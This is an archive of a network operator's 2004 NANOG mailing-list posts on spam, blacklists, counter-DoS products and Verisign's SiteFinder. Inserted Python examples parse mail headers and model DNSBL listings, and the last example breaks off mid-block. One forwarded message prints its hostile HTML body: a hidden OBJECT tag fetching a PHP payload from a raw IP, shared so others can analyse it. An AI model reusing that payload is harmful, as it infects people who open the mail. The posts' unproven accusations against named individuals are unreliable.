Re: Strange message possibly through nanog mail server
On Wednesday, March 17, 2004 5:57 PM [EST], william(at)elan.net [EMAIL PROTECTED] wrote:

> I just received this. I would like to check if others have received it and whether it did indeed come through the nanog mailing list:
>
> Date: Wed, 17 Mar 2004 21:10:38 +
> From: Deep Throat [EMAIL PROTECTED]
> To: [EMAIL PROTECTED]
> Subject: Spamhaus Exposed
>
> Disturbing information on one of the founders of Spamhaus.org
> http://www.geocities.com/jackjack9872004/
> ___
>
> And while the website was unavailable and the sender is being anonymous (which is against nanog list policies if this was sent through it), what I do find worse is that they managed to do it so that [EMAIL PROTECTED] is not added to CC (which, if I understood, is always supposed to happen when something goes through this mail list, which makes me think it might have come through the merit mail machine but not actually through the mail list). What I find even more disturbing is that the ip address listed as origin (which may well have been forged if they managed to gain some higher level access to merit servers) is that of the US Military. Below is the header for your review. I do however find it slightly more likely that it's some kind of sophisticated joe-job on spamhaus and that the info is forged, but they may have used some bug in merit mail software.

I got it too. Let me throw some insight into this - notice the To line:

To: [EMAIL PROTECTED]

IIRC, that's Peter Schroebel, aka SMS Online. Peter has it out for Steve Linford of SpamHaus because SMS Online is listed for hosting spammers. He claims that SpamHaus wanted $10k from him to be removed. Peter tried to bribe the AHBL a few weeks ago to get us to remove him from our system. Peter likes to gloat about all the connections he has, and how powerful he is (though I have yet to see proof of this).

So, I'm not exactly sure what to make of this... It could be Peter, and the mirror of the page I've seen certainly makes it look like something he'd write. But, could be a joe job too.
-- 
Brian Bruns
The Summit Open Source Development Group
Open Solutions For A Closed World / Anti-Spam Resources
http://www.sosdg.org
The Abusive Hosts Blocking List
http://www.ahbl.org
Re: Request response
Erm, something is definitely up tonight. Message is below, for those of you who didn't want to touch this message. I can't get to the site listed in the message, so I have no idea what it's trying to deliver exactly. Anyone care to comment?

Return-path: [EMAIL PROTECTED]
Envelope-to: [EMAIL PROTECTED]
Delivery-date: Wed, 17 Mar 2004 21:41:31 -0500
Received: from trapdoor.merit.edu ([198.108.1.26] ident=postfix) by mail.sosdg.org with esmtp (Exim 4.30) id 1B3nTO-00021v-N6; Wed, 17 Mar 2004 21:41:30 -0500
Received: by trapdoor.merit.edu (Postfix) id 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Received: by trapdoor.merit.edu (Postfix, from userid 56) id 35AD791331; Wed, 17 Mar 2004 21:40:47 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by trapdoor.merit.edu (Postfix) with ESMTP id 724909132F for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:44 -0500 (EST)
Received: by segue.merit.edu (Postfix) id 5A6015DE6E; Wed, 17 Mar 2004 21:40:44 -0500 (EST)
Delivered-To: [EMAIL PROTECTED]
Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 8220D5DE34 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:43 -0500 (EST)
Date: Thu, 18 Mar 2004 13:40:35 +1000
To: [EMAIL PROTECTED]
From: [EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.
Sender: [EMAIL PROTECTED]
Precedence: bulk
Errors-To: [EMAIL PROTECTED]
X-Loop: nanog
X-Scan-Signature: 0642888b67059a54bfdd4dcbc5a4659b
X-SA-Exim-Connect-IP: 198.108.1.26
X-SA-Exim-Mail-From: [EMAIL PROTECTED]
Subject: Request response
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on everest.sosdg.org
X-Spam-Level: ***
X-Spam-Status: No, hits=7.0 required=9.0 tests=BAYES_01,DCC_CHECK,
	FORGED_MUA_OUTLOOK,FORGED_OUTLOOK_TAGS,HTML_MESSAGE,MIME_HTML_ONLY,
	NORMAL_HTTP_TO_IP,NO_REAL_NAME,WEIRD_PORT autolearn=no version=2.63
X-Spam-Report:
	*  0.2 NO_REAL_NAME From: does not include a real name
	* -1.5 BAYES_01 BODY: Bayesian spam probability is 1 to 10%
	*      [score: 0.0600]
	*  0.1 HTML_MESSAGE BODY: HTML included in message
	*  0.3 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  0.1 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
	*  1.4 WEIRD_PORT URI: Uses non-standard port number for HTTP
	*  2.9 DCC_CHECK Listed in DCC (http://rhyolite.com/anti-spam/dcc/)
	*  1.0 FORGED_OUTLOOK_TAGS Outlook can't send HTML in this format
	*  2.6 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook
X-SA-Exim-Version: 4.0 (built Tue, 16 Mar 2004 14:56:42 -0500)
X-SA-Exim-Scanned: Yes (on mail.sosdg.org)
Status:

<html><body><font face=System><OBJECT STYLE=display:none DATA=http://24.84.218.164:81/641280.php;></OBJECT></body></html>
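An added example (mine, not code from the post or from the list software) of how I'd read the forwarded message above programmatically: walk the Received chain to find the hop at which it entered the Merit relays, and pull the hidden OBJECT out of the HTML-only body, flagging the same dotted-decimal host and non-standard port that SpamAssassin scored. RAW_MESSAGE is a trimmed copy of the headers quoted above (addresses are the page's own [EMAIL PROTECTED] redactions); TRUSTED_MTAS and the helper names are assumptions for the example.

```python
"""Trace the forwarded 'Request response' message: where did it enter the
Merit relays, and what does the hidden OBJECT in the body point at?

Added example, not code from the post. RAW_MESSAGE is a trimmed copy of the
headers quoted above; TRUSTED_MTAS and the helper names are assumptions."""
import re
from email import message_from_string
from email.message import Message
from urllib.parse import urlsplit

# Constructed sample: the quoted headers, trimmed, with the HTML body.
RAW_MESSAGE = """\
Received: from trapdoor.merit.edu ([198.108.1.26] ident=postfix) by mail.sosdg.org with esmtp (Exim 4.30) id 1B3nTO-00021v-N6; Wed, 17 Mar 2004 21:41:30 -0500
Received: by trapdoor.merit.edu (Postfix) id 6E9DA91333; Wed, 17 Mar 2004 21:40:47 -0500 (EST)
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41]) by trapdoor.merit.edu (Postfix) with ESMTP id 724909132F for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:44 -0500 (EST)
Received: from PH02887.net (unknown [203.18.63.43]) by segue.merit.edu (Postfix) with SMTP id 8220D5DE34 for [EMAIL PROTECTED]; Wed, 17 Mar 2004 21:40:43 -0500 (EST)
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Request response
X-Mailer: Microsoft Outlook Express 6.00.2600.
Content-Type: text/html; charset=us-ascii

<html><body><font face=System><OBJECT STYLE=display:none DATA=http://24.84.218.164:81/641280.php></OBJECT></body></html>
"""

# Relays whose Received lines we take at face value (Merit's list machines,
# per the headers). Assumption for the example.
TRUSTED_MTAS = {"198.108.1.26", "198.108.1.41"}

RECEIVED_FROM = re.compile(
    r"\bfrom\s+(?P<helo>\S+)\s+\((?P<rdns>[^\s\[\)]+)?\s*\[(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\]",
    re.I)
RECEIVED_BY = re.compile(r"\bby\s+(?P<by>\S+)", re.I)
RECEIVED_WITH = re.compile(r"\bwith\s+(?P<proto>\S+)", re.I)


def received_hops(msg: Message) -> list:
    """Hops oldest-first. Each MTA prepends its own Received line, so the
    last header in the block is the first hop."""
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        flat = " ".join(value.split())
        m_from, m_by, m_with = (p.search(flat) for p in (RECEIVED_FROM, RECEIVED_BY, RECEIVED_WITH))
        hops.append({
            "helo": m_from.group("helo") if m_from else None,
            "rdns": m_from.group("rdns") if m_from else None,   # 'unknown' = no reverse DNS
            "ip": m_from.group("ip") if m_from else None,
            "by": m_by.group("by") if m_by else None,
            "proto": m_with.group("proto") if m_with else None,
        })
    return hops


def origin_hop(hops: list) -> dict:
    """Walk newest-first through hops added by relays we trust; the first
    'from' address outside that set is where the message entered. Anything
    older than that hop is the sender's own word and is ignored."""
    for hop in reversed(hops):
        if hop["ip"] is None:
            continue  # local handoff ("Received: by ..."), nothing to check
        if hop["ip"] not in TRUSTED_MTAS:
            return hop
    return {}


OBJECT_TAG = re.compile(r"<object\b([^>]*)>", re.I)
ATTR = re.compile(r"(\w+)\s*=\s*(\"[^\"]*\"|'[^']*'|[^\s>]+)")
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def hidden_object_urls(html: str) -> list:
    """Every <OBJECT> with a DATA URL, plus the signals worth acting on:
    display:none, a dotted-decimal host, a port other than 80/443."""
    found = []
    for tag in OBJECT_TAG.finditer(html):
        attrs = {k.lower(): v.strip("\"'") for k, v in ATTR.findall(tag.group(1))}
        url = attrs.get("data")
        if not url:
            continue
        parts = urlsplit(url)
        found.append({
            "url": url,
            "hidden": "display:none" in attrs.get("style", "").replace(" ", "").lower(),
            "ip_literal": bool(IPV4.fullmatch(parts.hostname or "")),
            "port": parts.port,
            "weird_port": parts.port not in (None, 80, 443),
        })
    return found


def analyze(raw: str) -> dict:
    msg = message_from_string(raw)
    hops = received_hops(msg)
    body = msg.get_payload(decode=True).decode(msg.get_content_charset() or "us-ascii", "replace")
    return {
        "hops": hops,
        "origin": origin_hop(hops),
        "claimed_mailer": msg.get("X-Mailer"),
        "objects": hidden_object_urls(body),
    }


if __name__ == "__main__":
    result = analyze(RAW_MESSAGE)
    o = result["origin"]
    print(f"entered at {o['by']} from {o['helo']} [{o['ip']}] rdns={o['rdns']} via {o['proto']}")
    for obj in result["objects"]:
        print("OBJECT:", obj)
```

Everything above the segue hop was added by Merit or sosdg machines, so the only unverifiable claim in the chain is the first one: a host with no reverse DNS, HELOing as PH02887.net and speaking plain SMTP into segue.merit.edu. The X-Mailer line is just another header the sender typed, which is what FORGED_MUA_OUTLOOK is scoring.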
Re: Packet Kiddies Invade NANOG
On Monday, March 15, 2004 1:11 PM [EST], John Harold [EMAIL PROTECTED] wrote:

> Yes, Gregory Taylor aka OseK is a perfect gentleman now. Here are logs from Feb 4th 2004 showing him being a perfect gentleman...

You know how easy it is to fake IRC logs?

(16:12:01) #nanog!jh I l33t hax0red y0uz!
(16:12:30) #nanaog!skrptkd No, I l33t hax0red y0uz first!

and on and on. I don't know why you people seem to think I'm involved with all of this stuff. If you want to show evidence, do it offlist and among yourselves, because I don't think people give a crap about your little spats between one another - especially not based on IRC logs.
Re: Cisco's Website down?
On Mon, March 15, 2004 3:21 pm, [EMAIL PROTECTED] said:

> Anyone else seeing an error getting to www.cisco.com?

Yep, from AOL, level3, and RoadRunner. All coming back as 403.
RE: Cisco website www.cisco.com 403 forbidden?
On Mon, March 15, 2004 3:41 pm, Todd Mitchell - lists said:

> | Behalf Of Jay Hennigan
> | Sent: March 15, 2004 3:19 PM
> |
> | Is it just me that they don't like?
>
> All fixed now, but load times are hella slow:

Probably a million other people just discovered it was back up as well. I know a lot of users that will just sit there, hitting refresh over and over again until the site finally comes up, instead of just going to do something else and coming back later. Then, when it finally comes back up, you have a million users who are hitting refresh over and over again because the site is slow, creating even more load, and you get the picture. :-)
Re: www.sunfreeware.com down too?
On Mon, March 15, 2004 3:51 pm, Jon R. Kibler said:

> Have noticed several sites down today. Can't seem to get to www.sunfreeware.com as well as Cisco.

Works fine here. Possibly some flapping going on somewhere? I just logged into several routers and checked; I see nothing entirely out of the ordinary, but I don't have the most wide view of the Internet from these routers. It could also be DoS attacks too.
Re: Cisco's Website down?
On Monday, March 15, 2004 6:01 PM [EST], Stephen J. Wilcox [EMAIL PROTECTED] wrote:

> > > Anyone else seeing an error getting to www.cisco.com?
> >
> > Yep, from AOL, level3, and RoadRunner. All coming back as 403.
>
> You expected the webserver to react differently depending on how your packets got there?
>
> Steve

Possibly multiple web servers, each handling different areas, in some sort of a cluster? It's not unheard of. I used to have a system like that for one of my customers - based on where the traffic was coming from, the front end server routed the connections to the various backend web servers, which would serve up slightly different data. Someone comes from RU, send them to a specific server which handles content for Russia, and so on.

403 means permission denied, correct? Also could mean that it's got the IP range you are coming from blacklisted. (Try visiting the Blars BL homepage from a blacklisted IP address, and you'll see what I mean).

When trying to figure out where a problem is, sometimes it's good to try from multiple locations regardless, even if it seems to be a problem specifically with the server itself.
Re: who offers cheap (personal) 1U colo?
On Sunday, March 14, 2004 4:58 PM [EST], Janet Sullivan [EMAIL PROTECTED] wrote:

> My cable modem provider filters port 25, so I can't run my own SMTP server. Their mail servers suck. Yes, I could pay for a business class cable modem connection and they'd unblock the port... but I'd likely still be filtered. Guess who is having a dedicated 1U set up right now? ;-) I think Paul is right, there is a small niche market for this.

Hm, are there companies out there that offer outbound SMTP services (for people who are blocked, or who need a mail server that's not blacklisted because their provider isn't dealing with spam problems)? I never really looked into it too much, but I haven't seen it offered on providers' sites outright.

I was considering setting up a service like this (we have 2-3 outbound mail relay servers that are sitting idle because we don't need them yet), but wasn't sure how interested people would be. Like, say, set up a service that offers people the ability to send outbound mail through based on IP ACLs, possibly SMTP AUTH, TLS/SSL certs, and other things which could authenticate the sender, and have it accept SMTP on various other non-25 ports.
RE: who offers cheap (personal) 1U colo?
On Sun, March 14, 2004 5:45 pm, Vivien M. said:

> Have you been looking at providers in the right industry? Such services are usually offered as addons by people who sell DNS services (especially dynamic DNS) and other such things designed to make it easier for people to run their own servers. They do exist, and as was pointed out earlier in this discussion, cost much less than the 1U colo alternative. We do it, and I know at least one or two others in our industry do...

I have actually. I see an awful lot of services for incoming SMTP filtering of spam/viruses, or just to hold the mail while you are offline, but haven't seen outgoing SMTP services - which is why I asked :-)
Re: Counter DoS
On Thursday, March 11, 2004 2:43 AM [EST], Jay Hennigan [EMAIL PROTECTED] wrote:

> On the other hand, they could become immensely popular, reaching the critical mass when one of them detects what is interpreted as an attack from a network protected by another. Grab the popcorn and watch as they all bludgeon each other to death. :-)

Sounds like efnet channel wars on a much more interesting scale. Like I've said in previous posts - do we really want these people having tools like this? Doesn't this make them the equivalent of 'script kiddies'? How the hell could a company put something like this out, and expect not to get themselves sued to the moon and back when it fires a shot at an innocent party?
Re: Counter DoS
On Thursday, March 11, 2004 3:05 AM [EST], Brian Bruns [EMAIL PROTECTED] wrote:

> Sounds like efnet channel wars on a much more interesting scale. Like I've said in previous posts - do we really want these people having tools like this? Doesn't this make them the equivalent of 'script kiddies'? How the hell could a company put something like this out, and expect not to get themselves sued to the moon and back when it fires a shot at an innocent party?

I hit send way too fast, heh.

What's going to happen when they find a nice little exploit in these buggers (even if they have anti-spoof stuff in them) that allows the kids to take control of them or trick them into attacking innocents? Instead of thousands of DDoS drones on DSL and cable modems, you'll see kids with hundreds of these 'nuclear strike firewalls' on T1s, T3s, and higher, using them like they use the current trojans? No product is 100% secure (especially not something that runs under Windows, but that's another issue), so how are they going to deliver updates? Or make sure that the thing is configured right?

I could see blacklists (BGP based) cropping up of these systems, so that you can filter these networks from ever being able to come near your network.

This is starting to sound more and more like a nuclear arms race - on one side we have company A, on the other company B. Company A fears that B will attack it, so they get this super duper nuclear strike system. Company B follows suit and sets one up as well. Both then increase their bandwidth, outdoing the other until finally a script kiddie comes along, and spoofs a packet from A to B, and B attacks A, and A responds with its own attack. ISPs hosting the companies fall flat on their face from the attack, the backbone between the two ISPs gets lagged to death, and stuff starts grinding to a halt for others caught in the crossfire.

So, who thinks that this is a good idea? :)
Re: Counter DoS
On Thursday, March 11, 2004 6:16 PM [EST], william(at)elan.net [EMAIL PROTECTED] wrote:

> > Which RBL operators flood /24's or /16's? What do they flood them with?
>
> I think he meant that RBLs sometimes include an entire /24 in the RBL list when only one or two ips are at fault and some would go even higher to include an entire ISP allocation. This is probably talking about SPEWS and similar RBLs.

That usually only happens when providers ignore abuse reports and don't do something about their abusive customers. That's how we do it at the AHBL - you ignore abuse reports for long enough and pretend like the problem doesn't exist, you get a /24 listed. You move the spammer to another block inside your network, and it grows to encompass the new block as well as the old one. And it keeps going from there.

That's how the rima-tde blocks that are in the AHBL got started - single /32s, then as the spam and 419 scams came in faster, it expanded to /24s, and finally after 2 dozen or so /24s blocked, I started going for /20s and larger. Now I've got two /13s and a /16 of theirs blocked until Telefonica decides to contact us and discuss the situation with the abuse coming from their network.

When providers don't act on abuse, you have to put the pressure on. Sometimes, that means forcing their legit customers to start to complain and throw a fit with their provider over the blocks. Yes, it's ugly and unfair, but that's the only way to get them to act.
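An added example, mine rather than the AHBL's code or anyone's production zone, of the mechanics behind the escalating listings described above: a DNSBL is a set of CIDR listings, the receiving mail server reverses the octets of the connecting IP and looks up `<reversed-ip>.<zone>`, and widening a listing from /32 to /24 to /20 catches every address inside it. The zone name, the listings and the client addresses are constructed from documentation ranges, not any real provider's space.

```python
"""How a DNSBL lists and answers for CIDR blocks of growing size.

Added example; not the AHBL's code. The zone name, the listings and the
client addresses are constructed for illustration."""
import ipaddress
from typing import Dict, Optional, Tuple

ZONE = "dnsbl.example.org"   # assumed zone name
LISTED_A = "127.0.0.2"       # conventional "listed" A record

# Constructed listings: one host, the /24 it sits in after escalation, and
# two unrelated /24s. The value is the reason a TXT record would carry.
LISTINGS: Dict[str, str] = {
    "192.0.2.77/32": "spam source, abuse desk ignored reports",
    "192.0.2.0/24": "spammer moved within the block; listing widened",
    "198.51.100.0/24": "419 scams",
    "203.0.113.0/24": "open proxies",
}


def query_name(ip: str, zone: str = ZONE) -> str:
    """The name a mail server actually looks up: octets reversed, zone appended."""
    octets = str(ipaddress.IPv4Address(ip)).split(".")
    return ".".join(reversed(octets)) + "." + zone


def lookup(ip: str, listings: Dict[str, str] = LISTINGS) -> Optional[Tuple[str, str]]:
    """Most specific listing covering `ip`, as (cidr, reason), or None."""
    addr = ipaddress.IPv4Address(ip)
    best: Optional[Tuple[ipaddress.IPv4Network, str]] = None
    for cidr, reason in listings.items():
        net = ipaddress.IPv4Network(cidr)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, reason)
    return (str(best[0]), best[1]) if best else None


def answer(qname: str, listings: Dict[str, str] = LISTINGS, zone: str = ZONE) -> Optional[str]:
    """What the zone returns for a reversed-octet query: the A record if
    the address is listed, None (NXDOMAIN) otherwise."""
    if not qname.endswith("." + zone):
        return None
    rev = qname[: -len(zone) - 1].split(".")
    if len(rev) != 4:
        return None
    return LISTED_A if lookup(".".join(reversed(rev)), listings) else None


def escalate(listings: Dict[str, str], cidr: str, reason: str) -> Dict[str, str]:
    """Widen the listing to `cidr`, dropping narrower listings it now covers:
    the /32 -> /24 -> /20 progression described in the post."""
    new = ipaddress.IPv4Network(cidr)
    kept = {c: r for c, r in listings.items()
            if not ipaddress.IPv4Network(c).subnet_of(new)}
    kept[str(new)] = reason
    return kept


def smtp_decision(client_ip: str, listings: Dict[str, str] = LISTINGS) -> str:
    """What an MTA that rejects on this zone says to the connecting client."""
    hit = lookup(client_ip, listings)
    if hit:
        return f"554 5.7.1 Client host [{client_ip}] blocked using {ZONE}; {hit[1]}"
    return "220 ready"


if __name__ == "__main__":
    wider = escalate(LISTINGS, "192.0.0.0/20", "provider ignores abuse reports")
    for ip in ("192.0.2.77", "192.0.3.1", "198.51.100.9", "192.0.20.1"):
        print(query_name(ip), "->", answer(query_name(ip), wider), "|", smtp_decision(ip, wider))
```

The most-specific match in `lookup` is what lets a /32 keep its own reason while the surrounding /24 carries the escalation note; once `escalate` widens to a /20, the narrower entries are redundant and go away, which is also why a provider's clean customers start getting 554s and phoning their abuse desk.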
Re: wholesalebandwidth.com major sponsor of spammers refuses to accept email at abuse
On Thursday, March 11, 2004 10:11 PM [EST], Henry Linneweh [EMAIL PROTECTED] wrote:

> I have received almost 200 different spam messages from domains hosted by this provider from Russian domains attempting to sell pharmaceuticals and other unsolicited services that I do not want. tekmailer.com and moosq.com are 2 of the primary abusers from this hosting company.
>
> -Henry
>
> Message from yahoo.com. Unable to deliver message to the following address(es).
>
> [EMAIL PROTECTED]: 69.6.21.60 does not like recipient.
> Remote host said: 550 5.7.1 [EMAIL PROTECTED]... Relaying denied
> Giving up on 69.6.21.60.

Wholesalebandwidth is just a front-end for spammers. I've had them blacklisted for a long time with no ill effects (and a lot less spam).
Need a cox.net mail server contact
Hello all,

If a cox.net mail admin, or someone who knows a cox.net mail admin, could contact me offlist about them blocking 2mbit.com in their mail servers, that would be great. I've tried contacting their [EMAIL PROTECTED] with UNBLOCK in the subject, but it just bounces the mail back at me with the same error as if I was trying to contact one of their users. Sooo, you kinda see the issue.

Thanks
Re: Need a cox.net mail server contact
On Thursday, March 11, 2004 1:19 AM [EST], Gregory Taylor [EMAIL PROTECTED] wrote:

> The IP that 2mbit.com inhabits is on a Road Runner commercial block, which is allocated for small to mid-sized businesses. There is no reason for commercial cable networks to be blocked under the same pretenses that consumer cable networks are blocked. Just my 2 cents

It's the domain specifically. Not the IP. I can send to cox.net using one of my other dozen domain names from our IPs directly without a block. But, no matter where I try 2mbit.com from, it's blocked.

I suspect it has something to do with the 'fix' I was told by cox.net was in place to prevent them from DoSing our mail servers with bounces. Rather than actually fixing their mail servers, just block my domain so that the joe job doesn't cause bounces in the first place. How nice of them eh? Guess my cox.net mail server blacklist entry in the AHBL during the attack didn't get the message through.
Re: Information Warfare
On Saturday, March 06, 2004 4:46 AM [EST], william(at)elan.net [EMAIL PROTECTED] wrote:

> Here is a quote from their press-release I especially like:
>
> ... Symbiot has introduced the first and only tool that intelligently and accurately responds to hostile attacks against enterprise networks, said Richard Forno, former chief security officer for Network Solutions, and a noted information warfare specialist. While other companies offer only passive defense barriers, Symbiot provides the equivalent of an active missile defense system ...

Lovely. So not only do we now have to fend off attacks from script kiddies and packet monkeys, we now have to fend off attacks from idiot sysadmins who set this tool up and allow it to go all out on supposed 'attacks' against their systems.

I'll share my favorite goober with firewall story. When I was a sysadmin/netadmin at a large ISP, I used to get these 'attack' reports from clueless users all the time. I could identify which tool they used just by how the body of the message looked and how the 'attack' was described. Got ones saying that my performance testing server (which sometimes did ping scans across the dialups to see what the general response time was) was 'attacking' the user's machine with a single ICMP echo. Or how our IRC server was trying to attack the user on the ident port every time they tried to connect.

Of course, the best one was when a supposed 'security expert' called up and complained how my two caching DNS servers for the T1 customers were attacking his entire network on port 53 UDP. He had naturally filtered the 'attack' because it was obvious that our Linux DNS servers were infected with one of the latest Windows viruses going around, and suddenly no one on his network could browse the web anymore.

So, let me ask the question, do we really want people like that having a tool which autoresponds to attacks with attacks? At least when he filtered out our DNS traffic, it only affected his network... But imagine if he had launched an attack against my DNS servers in response? Yeah, that's a great idea.

Of course, now that the AHBL does its own proxy testing, we get all sorts of fun reports from end users about our 'attacks' against their machines. The latest one demanded I tell her why we had scanned her, but wouldn't tell me her IP address or when the scan happened exactly, claiming that I had done the scan, so I should know what IP she is. Too bad I test over 100,000 IP addresses daily for open proxies.

Let's not even get into the legal consequences for a tool like this, especially if it backfires and launches an attack against the NIPC, for example.
Re: The Geography of Spam
On Tuesday, March 02, 2004 11:11 AM [EST], [EMAIL PROTECTED] [EMAIL PROTECTED] wrote:

> Thought folks might find this blurb from Sophos on the geography of Spam interesting. 30% of Spam, they report, comes from hijacked PC's. Matches pretty close to what we see across our network - i.e. all sorts of stuff from swbell.net
>
> o U.S. Routes More Spam than World Combined, Study Shows
>
> Paris -- Intentionally or not, the U.S. routes more spam e-mail traffic than the rest of the world combined, according to a new study by anti-virus firm Sophos. The study concludes that most of the unsolicited junk e-mails originate in Russia and then pass through hacked computers in the U.S. More than 30% of the world's spam is sent from these compromised computers, underlining the need for a coordinated approach to spam and viruses, said Charles Cousins, Sophos' Asia managing director. The U.S. accounts for a whopping 56% of the global spam pie, followed by Canada with 6.8%. Europe did not fare very well in the report either, with the Netherlands (5th), Germany (7th), France (8th), the U.K. (9th) and Spain (12th) all making the list.
>
> http://www.sophos.com/spaminfo/articles/dirtydozen.html

I guess I can say that I can somewhat agree with what they are saying, but the percentage seems to be a bit lower than what I would have said. With the recent round of viruses that seem to be designed to help spammers hijack end user machines, I'd say the percentage is more towards 45-50%. Sometimes it's very hard to tell the difference between an open proxy and a drone running an open proxy (take the AHBL's proxy list, which is over 410,000 proxies listed, and our infected/hijacked machine count comes nowhere near that).

Part of the reason why a lot of the spam comes from outside of the US is because US spammers need to hide their actual locations in order to avoid getting snared by CAN-SPAM and similar. This is why Ralsky bases his spamming campaigns out of China, where the laws are more relaxed in terms of this stuff, and he is less likely to get yanked off of his net connection. This is also why spammers have 'fronts'. :-)
Need Comcast contact
Anyone happen to know of a contact for Comcast's mail server administrators? I need to discuss an issue with them about their mail servers mailbombing my systems from a joe job.

Thanks.
Microsoft on security holes
I just saw this on slashdot, so for those of you who don't read slashdot, enjoy.

http://news.bbc.co.uk/1/hi/technology/3485972.stm

Yeah, it's a little bit off topic, but with the recent amount of viruses, worms, trojans, etc going around the Internet that are causing havoc with general day to day operations of ISPs, this is quite an interesting read. Basically, Microsoft is claiming that security exploits only come out after patches. Uh huh, yeah right.

(waiting for his list AUP violation notice, again)
Re: ICANN/Registry Agreement:
On Thursday, February 26, 2004 8:21 PM [EST], Deepak Jain [EMAIL PROTECTED] wrote:

> Doesn't sitefinder give one registry superior access to the registry's resources than the others, etc, etc?

Rather than clutter up NANOG with this stuff, since it's apparent that we will be having more issues about SiteFinder, I've gone ahead and set up a discussion list on my server for general talk about SiteFinder. It's unmoderated, everyone is welcome to sign up and post your views.

http://wwwapps.2mbit.com/mailman/listinfo/sitefinder-discuss
Re: ICANN/Registry Agreement:
On Thursday, February 26, 2004 8:21 PM [EST], Deepak Jain [EMAIL PROTECTED] wrote:

> Doesn't sitefinder give one registry superior access to the registry's resources than the others, etc, etc?

It gives Verisign/NetSol the ability to generate exclusive profit from the hijacking of every non-existent domain name in existence. No other registrar could do something like this without paying for every last domain they take, nor could they ever do anything like this, due to the fact that Verisign/NetSol controls ALL of the TLD servers for .com and .net.
Re: [IP] VeriSign prepares to relaunch Site Finder -- calls
On Tuesday, February 24, 2004 3:09 PM [EST], Dan Hollis [EMAIL PROTECTED] wrote:

> On Tue, 24 Feb 2004, Jason Nealis wrote:
> > It's a module plug-in into bind and if you prefer to try and do this in an opt-in basis they have a client program that you download and it gets hooked into the users browser.
>
> This is the right way to do it, end user opt in, and browser only. Unilaterally forcing it upon everyone and breaking non www based apps is the wrong way to do it.
>
> -Dan

Also means less profit. We already know for a fact that Verisign/Netsol could give a damn about what's right and wrong, and what's a good way to do something and what's a bad way to do something. Anything that cuts into their profit they will kick and scream bloody murder about until they get their way.

Remember what happened when they were forced to allow other registrars access to their database? I remember specifically service quality going horribly through the floor, requests getting screwed up, almost on purpose, billing mess-ups that never happened before, etc. And this suddenly happened right around the same time that their monopoly was forcefully taken away. I don't even want to ponder what kind of outages and other issues we will have if they don't get their way.

I have a feeling that I'm going to get whacked for violating the AUP of the list, but oh well. Truth hurts.
Re: T1 Customer CPE Replacement?
On Monday, February 23, 2004 3:37 PM [EST], Claydon, Tom [EMAIL PROTECTED] wrote:

> Hello, We're looking for a good replacement for fractional T1 customers with Cisco 1600- 1700-series routers as their CPE. They are good routers, but the ongoing support costs are an issue, and we need to replace them ASAP. Someone had mentioned several CPE vendors, such as Adtran and Netopia. Are there any others, and does anyone have any pros/cons of what they're familiar with?

I'm quite familiar with the Netopia R53xx series T1 routers. Excellent little routers for deploying to customers. Very reliable, and if you are familiar with the DSL routers, you'll be right at home. They have built in PPTP/ATMP/IPSec VPN support (both client and server), basic routing features, filtering, NAT, one-to-one IP mapping, remote syslog logging, as well as everything you'd expect in a T1 router (fractional T1 support, HDLC, PPP, FrameRelay, etc). There's also a 56k dialup backup module which is handy.
Re: [IP] VeriSign prepares to relaunch Site Finder -- calls
On Tuesday, February 10, 2004 1:02 AM [GMT-5=EST], Scott Savage [EMAIL PROTECTED] wrote:

> When NXDOMAIN returned, the issue disappeared and we haven't tested it again.

I can confirm this same type of issue with several clients of mine that run Microsoft networking stuff: they suddenly were unable to locate devices on the network (like printers and NT file servers) as soon as the Verisign sitefinder stuff came online. I'll have to let my clients know who to bill when they do this again :-)

Actually, I wrote about a lot of the issues in my paper at:

http://www.sosdg.org/papers/VSGNWCD.html

It's not really geared to technical people, but might be useful if talking to end users about the problems associated with sitefinder. Should probably update it with some of the newer issues I've been finding.

Unfortunately, when you talk about SiteFinder, what ends up happening is that you can't avoid the financial end of it. There is no technical reason why SiteFinder needs to exist. It is purely a financial reason why SiteFinder exists. If they weren't concerned about money, Verisign would be offering all of the other registrars an opportunity to get involved too, and they wouldn't be selling ads on the site and paid search listings. AOL, MSN, and god knows how many other ISPs implement this internally on their networks without affecting the rest of the world.

Of course, I already know that Verisign is going to start saying that you can opt out of it this time around and how it won't break everything again. We all know that their claims are, well, full of crap. But, it's going to end up being how fast Verisign can spin it in their favor. I mean, look at SCO, and compare it to what Verisign is doing. They both don't seem to care how the rest of the world views them, and don't seem to have a problem turning the rest of the world against themselves. Of course, neither realizes that because of their actions, they will face opposition for the rest of their existence. People don't just forget stuff like this. Especially not when it happens multiple times.

Anyways, enough of my moaning about the problem for now. If anyone has any real life examples and stories they'd like to share with me so I can add to my paper on the SiteFinder issue, let me know offlist, and I'll add it.
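An added example of mine, not from the paper above or from Verisign's or any ISP's resolver code, of the two checks a resolver operator wanted against a registry wildcard: probe a zone with random unregistered names to see whether it ever returns NXDOMAIN, and, if it doesn't, turn the wildcard address back into NXDOMAIN so that Windows networking, MTAs and everything else that is not a browser fail the way they expect to. The stub resolvers and every address in the block are constructed so it runs offline; `.example` stands in for a TLD.

```python
"""Detect a registry wildcard (the SiteFinder pattern) and hand NXDOMAIN
back to applications that depend on it.

Added example, not from the paper or from any resolver. The stub resolvers
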